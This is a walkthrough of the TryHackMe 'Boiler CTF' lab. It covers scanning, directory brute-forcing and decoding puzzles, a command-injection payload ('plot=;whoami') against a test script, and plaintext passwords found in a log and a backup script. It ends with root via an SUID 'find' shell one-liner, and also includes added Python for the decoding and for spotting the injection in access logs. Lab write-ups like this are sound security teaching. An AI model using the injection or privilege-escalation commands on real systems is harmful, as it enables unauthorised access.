Boiler CTF TryHackMe

TASK 1: ENUMERATION

  • NMAP:
$ nmap -sC -sV 10.10.32.78 -oN nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 16:55 IST
Nmap scan report for 10.10.32.78
Host is up (0.32s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.82.50
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.56 seconds
$ ftp 10.10.32.78
  • -l gives the output in long list format
  • -a shows all files, including hidden ones (names starting with a dot)

Task 1–1:

txt

Task 1–2:

nmap -p- <machine ip>

Task 1–3:

In the nmap output you see
10000/tcp open http MiniServ 1.930 (Webmin httpd)
so Webmin is running.

Task 1–4:

Search for exploits against Webmin. On checking, you will find there is no exploit available for this version of the service; it is up to date.
$ cat .info.txt
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
ROT13 decoded, this reads:
Just wanted to see if you find it. Lol. Remember: Enumeration is the key!
  • Gobuster
gobuster dir -u http://10.10.32.78/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,xml -t 100 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.32.78/
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,xml,php,html
[+] Timeout: 10s
===============================================================
2020/08/16 17:51:00 Starting gobuster
===============================================================
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/joomla (Status: 301)
robots.txt contains:
User-agent: *
Disallow: /

/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075
The numbers are decimal ASCII codes; converting them gives a base64 string:
OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK
which base64-decodes to a 32-character hex string, the length of an MD5 digest:
99b0660cd95adea327c54182baa51584
which a hash lookup resolves to:
kidding
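The whole chain from .info.txt and robots.txt down to the final word, reproduced as an added Python example (not code from the original writeup): ROT13 for .info.txt, decimal ASCII to base64, base64 to the hex string, and a plain hash comparison of a guessed word against that hex string, which is what a hash-lookup site does.

```python
import base64
import codecs
import hashlib

# Strings exactly as they appear on the page (.info.txt and robots.txt).
INFO_TXT = "Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!"
ROBOTS_NUMBERS = (
    "079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 "
    "086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 "
    "078 084 069 049 079 068 081 075"
)


def rot13(text):
    """Undo the ROT13 applied to .info.txt (ROT13 is its own inverse)."""
    return codecs.decode(text, "rot_13")


def decimal_ascii_to_text(numbers):
    """Turn space-separated decimal byte values ('079 084 ...') into text."""
    return "".join(chr(int(n)) for n in numbers.split())


def base64_to_text(b64):
    """Decode base64; strip the trailing newline the original 'echo | base64' left in (the final 'K')."""
    return base64.b64decode(b64).decode("ascii").strip()


def looks_like_md5(s):
    """32 hex characters is the length of an MD5 hex digest (a hint, not proof)."""
    return len(s) == 32 and all(c in "0123456789abcdef" for c in s.lower())


def md5_matches(candidate, hexdigest):
    """Check one guessed plaintext against the recovered digest, as a hash-lookup site would."""
    return hashlib.md5(candidate.encode()).hexdigest() == hexdigest.lower()


def decode_chain(numbers):
    """Run the robots.txt chain and return the (base64, hex) stages."""
    b64 = decimal_ascii_to_text(numbers)
    return b64, base64_to_text(b64)


if __name__ == "__main__":
    print(rot13(INFO_TXT))
    b64, hexstr = decode_chain(ROBOTS_NUMBERS)
    print(b64)
    print(hexstr, "md5-shaped:", looks_like_md5(hexstr))
    print("md5('kidding') matches:", md5_matches("kidding", hexstr))
```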

Task 1–5:

Searching for Joomla shows that it is a CMS, so the answer for this is "joomla".
gobuster dir -u http://<ip>/joomla -w /usr/share/dirb/wordlists/common.txt -t 50
[+] Url: http://10.10.2.36/joomla
[+] Threads: 50
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/16 20:43:44 Starting gobuster
===============================================================
/_files (Status: 301)
/_test (Status: 301)
/~www (Status: 301)
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/_archive (Status: 301)
/_database (Status: 301)
/bin (Status: 301)
/build (Status: 301)
/cache (Status: 301)
/components (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/installation (Status: 301)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/index.php (Status: 200)
/templates (Status: 301)
/tests (Status: 301)
/tmp (Status: 301)
==================================================================
The plot parameter of the script under /joomla/_test is handed to a shell, so http://<ipaddr>/joomla/_test/index.php?plot=;<command-here> will execute the command:
http://10.10.2.36/joomla/_test/index.php?plot=;whoami
When you click on "select host", the last item in the list shows the command output, i.e. the name of the user: www-data.
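A detection-side view of the same flaw, added here as example code rather than anything from the writeup: scan Apache access-log lines for requests whose plot value contains shell metacharacters. The log lines are constructed for the example, and the query string is split on & only, because the ; is part of the value being inspected.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format lines (not taken from the page's host).
SAMPLE_LOG = """\
10.8.82.50 - - [16/Aug/2020:20:50:01 +0000] "GET /joomla/_test/index.php?plot=;whoami HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.8.82.50 - - [16/Aug/2020:20:50:09 +0000] "GET /joomla/_test/index.php?plot=localhost HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
10.8.82.50 - - [16/Aug/2020:20:50:15 +0000] "GET /joomla/_test/index.php?plot=%3Bid HTTP/1.1" 200 987 "-" "curl/7.68.0"
10.8.82.50 - - [16/Aug/2020:20:51:00 +0000] "GET /robots.txt HTTP/1.1" 200 65 "-" "gobuster/3.0.1"
"""

# client, ident, user, [timestamp], "METHOD target protocol"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
# Characters that let a value break out of the argument a script meant to pass to the shell.
SHELL_META = set(";|&`$(){}<>\n")


def query_values(query, param):
    """Values of `param`; split on '&' only, since ';' is payload here, not a separator."""
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == param:
            values.append(unquote_plus(value))
    return values


def suspicious_requests(log_text, param="plot"):
    """Return (ip, timestamp, decoded value) for every request whose `param` carries shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for value in query_values(urlsplit(m.group("target")).query, param):
            if SHELL_META & set(value):
                hits.append((m.group("ip"), m.group("ts"), value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} plot={value!r}")
```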

Task 1–6:

Here we find four files, but the odd one out is log.txt.
So the answer is log.txt. It contains:
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$

Task 2: POST Enumeration

TASK 2–1 :

$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log

DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATE
if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
        echo "Begining copy of" $i >> $LOG
        scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
        echo $i "completed" >> $LOG
        if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
            rm $SOURCE/$i
            echo $i "removed" >> $LOG
            echo "####################" >> $LOG
        else
            echo "Copy not complete" >> $LOG
            exit 0
        fi
    done
else
    echo "Directory is not present" >> $LOG
    exit 0
fi
answer is: backup

Task 2–2:

stoner@Vulnerable:~$ ls -la
total 20
drwxr-x--- 4 stoner stoner 4096 Aug 16 19:13 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
drwx------ 2 stoner stoner 4096 Aug 16 19:13 .cache
drwxrwxr-x 2 stoner stoner 4096 Aug 22 2019 .nano
-rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret
stoner@Vulnerable:~$ cat .secret 
You made it till here, well done.

Task 2 Privilege Escalation:

find / -perm -u=s 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap

Task 2–3:

So the answer for this is: find
find . -exec /bin/sh -p \; -quit

Task 2–4:

# cd /root              
# ls
root.txt
# cat root.txt
It wasn't that hard, was it?
